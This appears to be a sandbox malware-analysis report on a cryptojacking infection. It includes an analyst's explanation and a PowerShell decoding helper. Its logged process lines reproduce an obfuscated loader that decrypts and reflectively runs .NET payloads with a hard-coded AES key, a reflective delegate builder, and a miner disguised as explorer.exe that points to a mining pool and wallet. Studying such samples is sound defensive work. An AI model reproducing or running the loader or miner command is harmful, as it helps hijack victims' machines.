'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:fululhvbhhgj{param([outputtype([type])][parameter(position=0)][type[]]$nnulhbqztprdhv,[parameter(position=1)][type]$ofcpxnfkpy)$qvwxxlmoanu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+'me'+[char](109)+'o'+[char](114)+''+[char](121)+''+[char](77)+'odul'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+'e'+'t'+[char](121)+''+[char](112)+''+'e'+'','c'+[char](108)+''+'a'+'ss'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+''+[char](105)+''+[char](99)+''+[char](44)+''+'s'+''+[char](101)+''+[char](97)+''+'l'+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+'a'+'s'+[char](115)+','+[char](65)+''+[char](117)+''+[char](116)+'oc'+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qvwxxlmoanu.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+[char](101)+''+'c'+''+'i'+''+[char](97)+''+[char](108)+'n'+[char](97)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+'by'+[char](83)+''+'i'+''+[char](103)+''+[char](44)+'pu'+'b'+''+'l'+'i'+'c'+'',[reflection.callingconventions]::standard,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+[char](117)+''+[char](110)+'t'+'i'+''+[char](109)+''+[char](101)+',ma'+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$qvwxxlmoanu.definemethod(''+'i'+''+'n'+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'','p'+'u'+''+[char](98)+'l'+[char](105)+'c'+','+''+[char](72)+''+[char](105)+'de'+'b'+''+'y'+''+'s'+'i'+[char](103)+','+[char](78)+''+'e'+''+'w'+''+'s'+''+[char](108)+'ot'+[char](44)+''+'v'+''+'i'+''+'r'+'t'+[char](117)+''+'a'+'l',$ofcpxnfkpy,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+'u'+''+[char](110)+''+'t'+''+[char](105)+'m'+[char](101)+''+','+'m'+'a'+'n'+[char](97)+'g'+[char](101)+''+'d'+'');write-output $qvwxxlmoanu.createtype();}$iknksxdttnkac=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+'ic'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+'t'+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+'.'+'u'+'n'+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+''+'n'+''+[char](97)+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+''+'h'+''+[char](111)+''+[char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:kvehnqwssgcg{param([outputtype([type])][parameter(position=0)][type[]]$mhkvivexzpriho,[parameter(position=1)][type]$qoutaubbtf)$msesbhasmah=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+'e'+'f'+[char](108)+''+'e'+''+'c'+'te'+'d'+'d'+[char](101)+'le'+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+''+[char](101)+''+'m'+''+[char](111)+'ry'+[char](77)+''+[char](111)+'dul'+'e'+'',$false).definetype(''+[char](77)+'y'+[char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[char](97)+''+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+'c'+''+'l'+''+[char](97)+''+'s'+'s'+','+''+[char](80)+''+[char](117)+''+[char](98)+'l'+[char](105)+'c'+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+''+[char](115)+''+[char](105)+'c'+[char](108)+''+[char](97)+''+[char](115)+'s,'+[char](65)+'u'+[char](116)+'o'+'c'+'la'+[char](115)+''+[char](115)+'',[multicastdelegate]);$msesbhasmah.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+'e'+'c'+'i'+''+[char](97)+''+[char](108)+''+[char](78)+'ame'+[char](44)+''+[char](72)+''+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+[char](99)+'',[reflection.callingconventions]::standard,$mhkvivexzpriho).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$msesbhasmah.definemethod(''+[char](73)+'nv'+'o'+'k'+'e'+'',''+[char](80)+''+'u'+''+'b'+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+'i'+'d'+'eb'+'y'+'s'+'i'+'g'+','+''+[char](78)+''+'e'+'w'+[char](83)+''+'l'+''+[char](111)+''+'t'+''+','+''+'v'+''+'i'+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qoutaubbtf,$mhkvivexzpriho).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+'t'+[char](105)+'m'+[char](101)+''+','+''+[char](77)+'ana'+[char](103)+''+[char](101)+'d');write-output $msesbhasmah.createtype();}$gffwslpcsixef=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+'s'+[char](116)+'e'+[char](109)+''+'.'+''+'d'+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+'i'+''+'c'+''+[char](114)+'o'+[char](115)+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+'i'+'n'+'32.'+[char](85)+'n'+[char](115)+''+[char](97)+''+'f'+''+[char](101)+'na'+[char](116)+'i'+[char](118)+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+''+[char](111)+''+[char](100)+'s');$xrdavnignzllon=$gffwslpcsixef.getmethod(''+'g'+''+'e'+''+[char](116)+''+[char](80)+''+'r'+'o'+[char](99)+''+'a'+''+[cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:yrwhxohynmxl{param([outputtype([type])][parameter(position=0)][type[]]$mjbpafoyxdmllp,[parameter(position=1)][type]$mbxclwmzji)$qsxeicuzieu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+[char](116)+'e'+[char](100)+''+[char](68)+'e'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+'m'+'e'+'m'+'o'+[char](114)+''+'y'+''+[char](77)+'o'+'d'+''+[char](117)+''+'l'+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'d'+'e'+''+'l'+'e'+[char](103)+'a'+[char](116)+'e'+[char](84)+''+'y'+''+'p'+'e',''+[char](67)+''+'l'+'a'+'s'+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+'ic'+[char](44)+''+[char](83)+''+[char](101)+''+[char](97)+'le'+'d'+','+[char](65)+''+'n'+'sic'+'l'+'a'+'s'+''+[char](115)+''+[char](44)+''+'a'+'ut'+[char](111)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qsxeicuzieu.defineconstructor(''+[char](82)+''+[char](84)+'sp'+[char](101)+''+[char](99)+''+'i'+'a'+[char](108)+''+[char](78)+''+[char](97)+''+[char](109)+'e,h'+'i'+''+'d'+'e'+'b'+''+'y'+'s'+[char](105)+''+'g'+''+[char](44)+''+[char](80)+'ub'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+'i'+''+'m'+''+'e'+''+[char](44)+''+'m'+'a'+[char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsxeicuzieu.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+''+'e'+'','p'+[char](117)+''+[char](98)+''+[char](108)+'i'+'c'+''+','+''+'h'+'i'+'d'+''+'e'+'b'+[char](121)+''+[char](83)+'i'+'g'+''+','+''+'n'+''+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+[char](116)+','+'v'+''+[char](105)+''+'r'+'t'+[char](117)+'a'+[char](108)+'',$mbxclwmzji,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+'u'+''+'n'+''+[char](116)+''+'i'+''+'m'+''+[char](101)+''+[char](44)+''+[char](77)+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+'d'+'');write-output $qsxeicuzieu.createtype();}$xabpoaxizgegr=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+'l')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+[char](114)+''+'o'+''+'s'+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+''+[char](105)+'n32'+[char](46)+'uns'+'a'+''+[char](102)+''+[char](101)+''+[char](78)+''+[char](97)+''+[char](116)+''+[char](105)+''+'v'+''+[char](101)+'m'+[char](101)+''+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$onnlowkafauoge=$xabpoaxizgegr.getmethod(''+'g'+''+[char](101)+''+[char](116)+''+'p'+'r'+[char](111)+''+[char](99)+'a'+[char](100)+''+'d'+''+[cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:nyguwfckeoje{param([outputtype([type])][parameter(position=0)][type[]]$kiydauqzmkkpvq,[parameter(position=1)][type]$ozrvwwezvx)$jczrwmspqgk=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+'f'+[char](108)+''+[char](101)+''+'c'+'t'+[char](101)+''+[char](100)+''+'d'+'e'+'l'+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('in'+[char](77)+'e'+[char](109)+''+[char](111)+'ry'+[char](77)+''+'o'+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+''+[char](101)+''+[char](103)+'a'+[char](116)+''+[char](101)+''+[char](84)+'yp'+'e'+'',''+'c'+''+'l'+''+'a'+''+'s'+'s,p'+[char](117)+''+[char](98)+''+[char](108)+''+'i'+'c'+','+''+[char](83)+''+[char](101)+''+'a'+'le'+'d'+''+[char](44)+''+'a'+''+[char](110)+''+[char](115)+''+[char](105)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+'u'+'t'+'o'+[char](67)+''+'l'+''+'a'+'ss',[multicastdelegate]);$jczrwmspqgk.defineconstructor('rt'+[char](83)+''+[char](112)+''+[char](101)+''+[char](99)+''+[char](105)+'a'+'l'+''+[char](78)+''+[char](97)+''+[char](109)+''+'e'+','+'h'+'i'+[char](100)+'e'+[char](66)+''+[char](121)+''+[char](83)+'ig'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$kiydauqzmkkpvq).setimplementationflags(''+[char](82)+''+[char](117)+''+'n'+''+[char](116)+'ime,'+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$jczrwmspqgk.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+[char](101)+'',''+[char](80)+''+[char](117)+''+'b'+''+'l'+''+[char](105)+''+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+'e'+'b'+'y'+''+[char](83)+''+[char](105)+''+[char](103)+','+'n'+''+[char](101)+'w'+[char](83)+''+'l'+''+[char](111)+''+[char](116)+''+','+'v'+[char](105)+'rt'+[char](117)+''+[char](97)+''+[char](108)+'',$ozrvwwezvx,$kiydauqzmkkpvq).setimplementationflags('r'+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+'a'+'ge'+'d'+'');write-output $jczrwmspqgk.createtype();}$fmzqsfzpmgsno=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+[char](121)+''+[char](115)+''+[char](116)+'em'+'.'+''+[char](100)+'ll')}).gettype(''+[char](77)+''+[char](105)+''+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+'o'+''+'f'+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+[char](46)+''+'u'+'ns'+'a'+''+'f'+''+'e'+''+[char](78)+''+'a'+'t'+[char](105)+''+'v'+'em'+[char](101)+''+[char](116)+''+'h'+'o'+[char](100)+''+[char](115)+'');$kczxemormgvaoj=$fmzqsfzpmgsno.getmethod(''+[char](71)+''+[char](101)+''+'t'+''+[
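The cmd.exe /c echo function elgju... entries above are the first loader stage. Stripping the 'blck' filler that the script itself removes at runtime (.replace('blck','')) shows what it does: read the .bat whose path is hard-coded in $dutvy (b.bat in the user's temp directory, later c:\windows\$rbx-onimai2\$rbx-co2.bat), take the first line beginning with ':: ', split it on '\', and for each half run Base64 decode, AES-CBC/PKCS7 decrypt (elgju), GZip decompress (vixdo) and then [system.reflection.assembly]::load followed by entrypoint.invoke($null, [string[]]('')) (gyumc). The powershell.exe "function local:... entries are the second stage, a reflective delegate builder whose every identifier is spelled as ''+[char](82)+'e'+... and which looks up Microsoft.Win32.UnsafeNativeMethods in System.dll and a method whose visible prefix decodes to GetProcAdd before the report truncates the line. The script below is an added analyst helper, not code from the sample or from this report: it decodes both string tricks offline and reproduces the Base64/AES/GZip path of the first stage, writing the recovered bytes to disk instead of loading them. The paths and the key/IV parameters are placeholders, and the self-test uses constructed data under a throwaway key. Caveat: the report renders command lines in lower case and Base64 is case-sensitive, so the key and IV strings printed above will not decode to the real values; copy them from the dropped .bat.

```powershell
# Added analyst helper, not code from the sample or from the report. Reproduces the data
# path of the obfuscated batch loader (':: ' carrier line -> split on '\' -> Base64 ->
# AES-CBC/PKCS7 -> GZip -> [Reflection.Assembly]::Load().EntryPoint.Invoke) but stops
# before Load/Invoke and writes the recovered bytes to disk instead.
# Assumptions: $BatPath/$OutDir and the key/IV parameters are placeholders. The report
# prints command lines lower-cased and Base64 is case-sensitive, so take the real
# key/IV from the dropped .bat, not from the report text.

function Remove-BlckPadding {
    # Stage 1 spells type names as 'sblckyblcks...' and strips the filler at runtime
    # (.replace('blck','')) right before invoke-expression; doing it offline exposes them.
    param([Parameter(Mandatory)][string]$Text)
    $Text.Replace('blck', '')
}

function Expand-CharConcat {
    # Stage 2 builds identifiers as ''+[char](82)+'e'+'f'+... ; replace every [char](N)
    # with its character, then collapse the '+' concatenations into one quoted literal.
    param([Parameter(Mandatory)][string]$Text)
    $t = [regex]::Replace($Text, '\[char\]\((\d+)\)', { param($m) "'" + [char][int]$m.Groups[1].Value + "'" })
    do { $before = $t; $t = $t -replace "'\+'", '' } while ($t -ne $before)
    $t
}

function Get-LoaderPayloads {
    # Decrypt and decompress every blob carried in the first ':: ' line of the .bat.
    # Nothing recovered is loaded or invoked; each blob is written as payload_N.bin.
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [Parameter(Mandatory)][string]$KeyBase64,   # from the real .bat, not from the report
        [Parameter(Mandatory)][string]$IvBase64,
        [Parameter(Mandatory)][string]$OutDir
    )
    $carrier = [System.IO.File]::ReadAllLines($BatPath) | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $carrier) { throw "no ':: ' carrier line in $BatPath" }
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($KeyBase64)
    $aes.IV  = [Convert]::FromBase64String($IvBase64)
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $results = @()
    $blobs = $carrier.Substring(3).Split('\')
    for ($i = 0; $i -lt $blobs.Count; $i++) {
        $ct  = [Convert]::FromBase64String($blobs[$i])
        $dec = $aes.CreateDecryptor()
        $gz  = $dec.TransformFinalBlock($ct, 0, $ct.Length)   # a wrong key/IV almost always fails here (bad padding)
        $dec.Dispose()
        $in  = New-Object System.IO.MemoryStream(,$gz)
        $out = New-Object System.IO.MemoryStream
        $gs  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
        $gs.CopyTo($out); $gs.Dispose(); $in.Dispose()
        $plain = $out.ToArray(); $out.Dispose()
        $path = Join-Path $OutDir ("payload_{0}.bin" -f $i)
        [System.IO.File]::WriteAllBytes($path, $plain)
        $results += [pscustomobject]@{
            Path        = $path
            Bytes       = $plain.Length
            # The loader hands this to Assembly.Load, so a correct key yields a PE ('MZ').
            LooksLikePE = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
        }
    }
    $aes.Dispose()
    $results
}

function Test-LoaderRecovery {
    # Offline self-check with constructed data: gzip+encrypt a dummy 'MZ' payload under a
    # throwaway key/IV, wrap it in a ':: ' carrier line, and confirm the recovery round-trips.
    $dir = Join-Path ([System.IO.Path]::GetTempPath()) ('loader_test_' + [guid]::NewGuid())
    $aes = [System.Security.Cryptography.Aes]::Create()          # fresh random Key/IV
    $payload = [System.Text.Encoding]::ASCII.GetBytes('MZ dummy payload constructed for the test')
    $ms = New-Object System.IO.MemoryStream
    $gs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
    $gs.Write($payload, 0, $payload.Length); $gs.Dispose()
    $gz = $ms.ToArray()
    $ct = [Convert]::ToBase64String($aes.CreateEncryptor().TransformFinalBlock($gz, 0, $gz.Length))
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    $bat = Join-Path $dir 'b.bat'
    Set-Content -Path $bat -Value "@echo off`r`n:: ${ct}\${ct}`r`necho loader stub" -NoNewline
    $r = Get-LoaderPayloads -BatPath $bat -OutDir $dir -KeyBase64 ([Convert]::ToBase64String($aes.Key)) -IvBase64 ([Convert]::ToBase64String($aes.IV))
    $ok = ($r.Count -eq 2) -and $r[0].LooksLikePE -and ($r[1].Bytes -eq $payload.Length)
    Remove-Item $dir -Recurse -Force
    $ok
}

# Decode two strings quoted in the report (lower-casing does not affect PowerShell identifiers).
Remove-BlckPadding '[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck'
Expand-CharConcat "''+[char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+[char](101)+''"
Test-LoaderRecovery
```

The two decode calls return [system.reflection.assembly]::load and 'ReflectedDelegate' (the quotes stay because the function rewrites the literal rather than evaluating it, which is the point: no invoke-expression is needed to read the second stage), and Test-LoaderRecovery returns True. Against a real sample, a correct key/IV gives LooksLikePE = True and a file that opens in a .NET decompiler; a mis-copied key almost always raises a CryptographicException in TransformFinalBlock, which is the cheapest check that the key was taken from the .bat and not from the lower-cased report.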
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91C2AF0 cpuid 18_3_0000025EE91C2AF0
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Queries volume information: C:\Users\user\Desktop\e7WMhx18XN.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
